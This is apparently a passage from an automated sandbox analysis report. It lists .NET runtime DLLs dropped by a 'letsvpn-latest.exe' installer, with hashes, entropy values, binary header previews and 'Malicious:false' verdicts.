                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............N*... ...@....... ..............................].....@..................................)..O....@..@............... ....`.......(............................................... ............... ..H............text...T.... ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B................0*......H.......P ......................D(......................................BSJB............v4.0.30319......l...L...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................................z.....N.....:.....b.................a...........0.....y...........K.....4...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.9...K.Y...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Reflection.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.840362171078928
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:+xDHKWAMW7hqWOHlLf2KQcvBZ93WXS+ShjmM6IGBkSMZLT:aD8jq3b2KZBZAXS+ST6nkrtT
                                                                                                                                                                                                  MD5:CA9071B879DFAEF54855D52E3DE0B199
                                                                                                                                                                                                  SHA1:9E6339E4B9BE8C070FB085098C727356D5DEE679
                                                                                                                                                                                                  SHA-256:665235BA4540CF50F9AD55572FF1396405205FD9E534D544542E338BD95D09B9
                                                                                                                                                                                                  SHA-512:5EF846C39C0F2C259262315F00D2AAE41EA83D797B8738E6878CBA26DD8654ECD878D036973114CD1E7B6405C6C2895F32CE33C8059D85B8CE14E3FA4C33CCB9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............r,... ...@....... ..............................W~....@................................. ,..O....@.................. ....`.......*............................................... ............... ..H............text...x.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................T,......H.......P ......................h*......................................BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID...........#Blob......................3................................"...............1.............{.................................Q.....j.......................n...................u.....u.....u...).u...1.u...9.u...A.u...I.u...Q.u...Y.u...a.u...i.u...q.u.......................#.....+.....3.....;.....C.....K.N...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Resources.Reader.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.937994273396533
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:v7LNBEW6pW4hqWOHlLf2KQcvBZ92d2S+ShjmM6IGBkSr:v7bMDq3b2KZBZfS+ST6nk4
                                                                                                                                                                                                  MD5:484B57EB0009BC68590CE5EB4A8DA97C
                                                                                                                                                                                                  SHA1:B0770A0D87F11173925C3890C42C257E9A8AE8F3
                                                                                                                                                                                                  SHA-256:C470136E7C0CA4A95A2BD2A0F33A7FF6BC9FFF04A6668B93FEEC1E6F76159B13
                                                                                                                                                                                                  SHA-512:58A7C977181AB80F21F28E5CC384D32188596FAB4351785A1F26332FC91D690C6B7A1C5B8C638146C42A8069202AFA6877986C3D7D5F586999FEE5ABAD2B7551
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ...............................|....@.................................D(..O....@.................. ....`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................x(......H.......P ..<....................&......................................BSJB............v4.0.30319......l...|...#~......0...#Strings............#US.........#GUID...,.......#Blob......................3......................................z...............\.....0..... .....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Resources.ResourceManager.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.9847654286076075
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:SKkHKW/tWZhqWOHlLf2KQcvBZ9e/MES+ShjmM6IGBkSJ:HuMq3b2KZBZIMES+ST6nky
                                                                                                                                                                                                  MD5:6CDF73BC6BBA86E628C7B38EDE282D29
                                                                                                                                                                                                  SHA1:A4D3651095CD90BB3499C311EE2D10A2168DA11B
                                                                                                                                                                                                  SHA-256:2E0406BCD2ADAA557F15CEA8F0068F5CF5F7D3DF081162B47EA7033C90CC3907
                                                                                                                                                                                                  SHA-512:7AEDC6B41B9B36A84FF6C0135EDE27EA533F6BE747F1552242E367D21FE945D815187D947BDE53D935F8049CAE5F17E0097E79A245EDA6425EF6817393490C22
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ...............................{....@..................................(..O....@..`............... ....`.......'............................................... ............... ..H............text...4.... ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B.................)......H.......P ......................$'......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3..................................................W.....W...R.D.........f.......................=.....V.....}...........q.........................>.....>.....>...).>...1.>...9.>...A.>...I.>...Q.>...Y.>...a.>...i.>...q.>.......................#.....+.....3.....;."...C.=...K.]...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Resources.Writer.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.938915021718061
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:bLnfIWqrWKhqWOHlLf2KQcvBZ9G4oS+ShjmM6IGBkSzC:bDf4zq3b2KZBZcS+ST6nk5
                                                                                                                                                                                                  MD5:7A8C5FD63F340E3A954FC88935DAF382
                                                                                                                                                                                                  SHA1:0445BC7202F7210085C141CD98B48D25350A7FBA
                                                                                                                                                                                                  SHA-256:7A2A22676BFF819F0BE8D538581FB6532BE3C4E1B68C46D6F25338C2A2D1C200
                                                                                                                                                                                                  SHA-512:922CCE6D593A83B2BADF5D8F9AB5C3B2FA2DFE59FEA58CB4B374A49844061948F2277A41F185B0DB3895E468889AFEF40702DE193A8A7AB8BD941CCA16650B85
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ....................................@.................................D(..O....@.................. ....`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................x(......H.......P ..<....................&......................................BSJB............v4.0.30319......l...|...#~......0...#Strings............#US.........#GUID...,.......#Blob......................3......................................z...............\.....0..... .....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20512
                                                                                                                                                                                                  Entropy (8bit):6.706301164600095
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:zybU8ndrbbT9NWB2WLhqWOHlLf2KQcvBZ9FAbS+ShjmM6IGBkS5:zy5ndvWlq3b2KZBZiS+ST6nkG
                                                                                                                                                                                                  MD5:9B69D7A653CF321BF2236EC3D2D0989D
                                                                                                                                                                                                  SHA1:E0EACFC753D1B590D04FC2423D3712635BE34109
                                                                                                                                                                                                  SHA-256:A5968200CB47E3D2911656095C2A64684EF1B671DD1FCEAB6DF21E67CA167D02
                                                                                                                                                                                                  SHA-512:D8FBC56DCA9A18706E33BDED2A95CB5131D298C9039CC7D0CF30ABD490EA2084850E8558C778DAC5E47349250810ABAC531CC5CB00DA41D7C52D219BAD0BD168
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Ksa...........!.................6... ...@....@.. ..............................+.....@..................................6..K....@...............".. ....`.......$............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................6......H.......D%..<...................P ......................................_...+.'g.......x2..}}...B.O....T...e..?.M..R"M.~pg..c..LD#..y.....y....:u.v*...#.;.-.h.......0..#.....a5|T%W...].!.%'..9.0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0..........*....0................*..0...............*...0..............

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.CompilerServices.VisualC.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.92741421615125
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Jna8WK1WchqWOHlLf2KQcvBZ9ehS+ShjmM6IGBkSi:Jna0Dq3b2KZBZyS+ST6nkh
                                                                                                                                                                                                  MD5:181B7B7DD03571FDBA1DB949008F3A27
                                                                                                                                                                                                  SHA1:0A2EC802959DD458243EDB23E1185522614649CF
                                                                                                                                                                                                  SHA-256:434085D54A52A6A04B59907392D29D335CD580C1D2ADE9B2D594E36F1BAEEB2D
                                                                                                                                                                                                  SHA-512:312C5F69C05D0B7BA98AE3434C7A07CFA7F016DC5B3E5C51A01AA1DFA569261E462F85D5393466A9CF2A59838696CAA5DAB42D72ED238553B2C5BB56E564246C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............j*... ...@....... ....................................@..................................*..O....@.................. ....`.......(............................................... ............... ..H............text...p.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................L*......H.......P ......................`(......................................BSJB............v4.0.30319......l...@...#~......0...#Strings............#US.........#GUID....... ...#Blob......................3................................................w.................!...........<.....Y.............................................................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.)...C.D...K.d...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Extensions.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.8768271726692625
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:sBSWITWEhqWOHlLf2KQcvBZ9eB/HTS+ShjmM6IGBkSC3:s6Jq3b2KZBZ6TS+ST6nkz
                                                                                                                                                                                                  MD5:09F7DC412A8BC2939DF58390A44EF397
                                                                                                                                                                                                  SHA1:8CF0D78B3E2D03393D6D3681E140B56F5539295D
                                                                                                                                                                                                  SHA-256:0168F05FB92421C3CBCDEB4E61CC018FBC970900DC0373AC89D2BBB8F3796738
                                                                                                                                                                                                  SHA-512:4CCF2E3AC7B5EDBEFB7E82044DF8890B022CE7270E348353D45C00A743EDA6F6C0513606E264D77892EC16A0A31CFC456575D95B8C394BC557F1E95DBB5A7855
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............*... ...@....... ...............................m....@..................................)..O....@.. ............... ....`.......(............................................... ............... ..H............text...$.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................*......H.......P .......................(......................................BSJB............v4.0.30319......l...@...#~..........#Strings............#US.........#GUID...........#Blob......................3..................................................|.....|...S.i.........g.................f...........5.....~...........P.....9...................c.....c.....c...).c...1.c...9.c...A.c...I.c...Q.c...Y.c...a.c...i.c...q.c.......................#.....+.....3.....;.....C.6...K.V...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Handles.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.980168973605658
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:o88cIIWNoWOhqWOHlLf2KQcvBZ9u6hJS+ShjmM6IGBkSpjR:o9cU0q3b2KZBZNS+ST6nkqR
                                                                                                                                                                                                  MD5:4AD043270CCF1EC848BA0D701F96707F
                                                                                                                                                                                                  SHA1:5DB514D9CBDD964A68C3DF3979DF1076D22F771F
                                                                                                                                                                                                  SHA-256:F37BE601E91F79D5950FD8CB00F78DE8219F62CC356DB811864670B5214E00DD
                                                                                                                                                                                                  SHA-512:B7DA1F79F8A92765FAFB9237EDC24878DD0CAB1AB94443B3DD0C1ED51346E9E602609C4D3AA1B17F2FFC57066259DBA075245ED47BBFAD5E4A2C348256AD54C1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............V)... ...@....... ....................................@..................................)..O....@.................. ....`.......'............................................... ............... ..H............text...\.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................8)......H.......P ......................L'......................................BSJB............v4.0.30319......l.......#~.. .......#Strings............#US.........#GUID...........#Blob......................3..................................................*.....*...c.....J.....w.................v.....,.....E.................`.....I...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.InteropServices.RuntimeInformation.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):24096
                                                                                                                                                                                                  Entropy (8bit):6.719377001772263
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:hkUwx9rm5go1fWKmmW6oqN5eWjaWShqWOHlLf2KQcvBZ9P/dS+ShjmM6IGBkS3:QrmoFmWdOSq3b2KZBZ7S+ST6nk4
                                                                                                                                                                                                  MD5:00C714EC354CEDC187475C1316951F60
                                                                                                                                                                                                  SHA1:A8FA0FCE113FC2ADBED50CA893B466C840B5511A
                                                                                                                                                                                                  SHA-256:FBA71B0BB6318887131D2035EB5FEBB666D1A9C912F64CDAAB3C5756D0BD34C9
                                                                                                                                                                                                  SHA-512:464B617EA3097BCB9D1F150B13535F8DAB7339AEE6F5766F5DC1641374E318186B17F284BEB9B7D2DFE2AA61385AE9DA243810ABB4A4E4B9049EED94D823C7B1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..&...........E... ...`....... ..............................z.....@.................................PE..O....`..x............0.. ............D............................................... ............... ..H............text....%... ...&.................. ..`.rsrc...x....`.......(..............@..@.reloc..............................@..B.................E......H........$...............A.......C......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*2r/..p.(....*......(....*2(.....(....*^~....-.(.........~....*.0..........~..........(.........(....-Y..(!....{/......5..,

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.InteropServices.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20000
                                                                                                                                                                                                  Entropy (8bit):6.794822093017821
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:A09bOAghbsDCyVnVc3p/i2fBVlAO/BRU+psbC984vmJHrE1dtx66aI2sU52RWVs8:ZOAghbsDCyVnVc3p/i2fBVlAO/BRU+pC
                                                                                                                                                                                                  MD5:317087D59DC1AA7C2F85D251BA44FDE0
                                                                                                                                                                                                  SHA1:C68481D9CADB05F85BBC83759CFA0C4CE0EC3ADA
                                                                                                                                                                                                  SHA-256:F0AAACDBF06DC2075B5B55EF652632FB4EE2D247E504AE49BF8846AC00D9F49E
                                                                                                                                                                                                  SHA-512:4F2D76505B2C88CD979B3F75378E38403E6726CA0746F2AF61E339D68C7B929FAEEACF39474D4EA207E65AF9B447DA0B46FAD88EB81E2896B4AA4647F0352C6D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............r5... ...@....... ....................................@................................. 5..O....@..P............ .. ....`.......3............................................... ............... ..H............text...x.... ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B................T5......H.......P ......................h3......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3................................r.....................e...........4.................3.....L...................................R...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Numerics.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.941755352854446
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:A7W6RWVhqWOHlLf2KQcvBZ9w2S+ShjmM6IGBkSC:A5Qq3b2KZBZPS+ST6nkR
                                                                                                                                                                                                  MD5:1E176549D8AB37CFB2177838FBBFD694
                                                                                                                                                                                                  SHA1:E561378ABC1F3C58AEC49BA4F180C188AD26CACE
                                                                                                                                                                                                  SHA-256:2390DA3A0A8319FB8C40DC9882950D6A39C2DBA9FA6FD60FC7F1CAB9E2062C7D
                                                                                                                                                                                                  SHA-512:79AD35289C20A0B450856DE79A9B8880365144872423F9F8F3BAD9E41BA11DF0EB5E9297EFD7B7F95419D1541C3FB6E3EAEEB39BAE3B5F08DB3938D41C6B838B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............(... ...@....... ....................................@.................................T(..O....@.................. ....`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P ..L....................&......................................BSJB............v4.0.30319......l.......#~......4...#Strings....(.......#US.,.......#GUID...<.......#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Formatters.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):7.020454355357436
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:SI5HeWFwTBsWZhqWOHlLf2KQcvBZ9nZbGNS+ShjmM6IGBkSG:SI5HFwTB5q3b2KZBZ7b6S+ST6nk9
                                                                                                                                                                                                  MD5:7CD6028BB33B9DBD396FD16F63BB286F
                                                                                                                                                                                                  SHA1:67F369E89650EA38D67EFE92BC030A1571742B3E
                                                                                                                                                                                                  SHA-256:C5729B2A7ACD4E422C0477D33109F160DC2460A1E7C8ACEC8DE74CEA8FC626EA
                                                                                                                                                                                                  SHA-512:1E3B6C031A8C6FA7287B72884FCD04CBF900E2B9E5CA169EB1C4FA2A3768A4A16F36203919A27F7F598680528BC994F3ED1774F695C8841E004D1679C09C146C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ....................................@.................................|)..O....@.................. ....`......D(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P ..t....................'......................................BSJB............v4.0.30319......l.......#~..H.......#Strings....@.......#US.D.......#GUID...T... ...#Blob......................3............................................................U.x...........................~.....4.....M.................h.....$...................r.....r.....r...).r...1.r...9.r...A.r...I.r...Q.r...Y.r...a.r...i.r...q.r.......................#.....+.....3.....;.)...C.D...K.d...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Json.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.990509022722697
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:rAJpVWbfkBnWUhqWOHlLf2KQcvBZ9N3rUdS+ShjmM6IGBkS7Dub:rAJpWfkBFq3b2KZBZL4dS+ST6nkYm
                                                                                                                                                                                                  MD5:462D114ADD9F6759004A49340C7721F0
                                                                                                                                                                                                  SHA1:719E5912B3B628C885D94708749EB7D3C4154211
                                                                                                                                                                                                  SHA-256:BB23D792673D6AA61AC4C38DEF659625903E6B9CB3952B782D7AFF11EDA6F811
                                                                                                                                                                                                  SHA-512:3F759B32181C142C9E9C35F5768C635D1ADE6300A3C32FA5D3D4071FE55B0AF5A61195580C90182D87812212FB7BB89180868DE7D42AC492A8396ED28F88A7EA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............>)... ...@....... ...................................@..................................(..O....@..`............... ....`.......'............................................... ............... ..H............text...D.... ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B................ )......H.......P ......................4'......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3......................................z...........@...\.@...0.-...`.....D.................C.................[.....x.....-.........................'.....'.....'...).'...1.'...9.'...A.'...I.'...Q.'...Y.'...a.'...i.'...q.'.......................#.....+.....3.....;.#...C.>...K.^...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Primitives.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22560
                                                                                                                                                                                                  Entropy (8bit):6.6557613974263905
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Q8R71h7yzt94dHWFgQBVWeHWFyTBVWvhqWOHlLf2KQcvBZ96Nm1iS+ShjmM6IGBK:R1dyAqgQBfqyTByq3b2KZBZoAgS+ST6K
                                                                                                                                                                                                  MD5:E8C9792083B8F193EC43C3CEA6FB581E
                                                                                                                                                                                                  SHA1:B5EA61F6AEA7525652B3D998680721F2B2CAA1C0
                                                                                                                                                                                                  SHA-256:B9D8D6A7796FBD9AA4D99D21C43B317325E14647CE8CA03A211326094F8F0AE8
                                                                                                                                                                                                  SHA-512:8083B3A1082D7BBA28D0A5F91C1425CE7D60F25DAA6A4752ED75BCBE2A7546502E6A974656737AD82AFACD1F3CB79215EB5DE663910634BD856779497417C701
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............8... ...@....... ..............................aB....@..................................8..O....@..8............*.. ....`.......7............................................... ............... ..H............text........ ...................... ..`.rsrc...8....@......................@..@.reloc.......`.......(..............@..B.................8......H.......|!..l............1..p...X7......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*......(....*..BSJB............v4.0.30319......l.......#~..h.......#Strings....\...4...#US.........#GUID...........#Blob...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Xml.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20512
                                                                                                                                                                                                  Entropy (8bit):6.793591248884187
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:1psBljcZQIVI8CNwbcyMWs4oBOW9MWG4tBOW2hqWOHlLf2KQcvBZ9T+ujS+Shjmy:zsPMQMI8COYyi4oBNw4tByq3b2KZBZJ4
                                                                                                                                                                                                  MD5:F4DD591DD75552218041D7EBEF66A71D
                                                                                                                                                                                                  SHA1:B255B7C96C17360E588A8015624C0FF412E70C87
                                                                                                                                                                                                  SHA-256:777427A4657CB26C393E51794B549729DDDCA90B44B0DC3922826EC162DE55DF
                                                                                                                                                                                                  SHA-512:3BDB1B18A267C79DC5971A87D59DCE6E5B6DAA4B3B0C29F7BA75C05E744C82B0884F2CFF5771E58FCDFC1E7B74CA5B1C4A71D296039BB18503EF7FB969D660F2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............3... ...@....... ....................................@..................................3..O....@...............".. ....`.......2............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................3......H........!..0...................L2.......................................s....*..s....*..0...........o....u......,..o....*.*.0..%........s..........(....r...p.$o......o....*:.(......}....*..{....*.(....z.(....z6.{.....o....*:.{......o....*.(....z:.{......o....*.(....z.(....z.BSJB............v4.0.30319......l.......#~.. .......#Strings....$...0...#US.T.......#GUID...d.......#Blob...........W..........3............................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
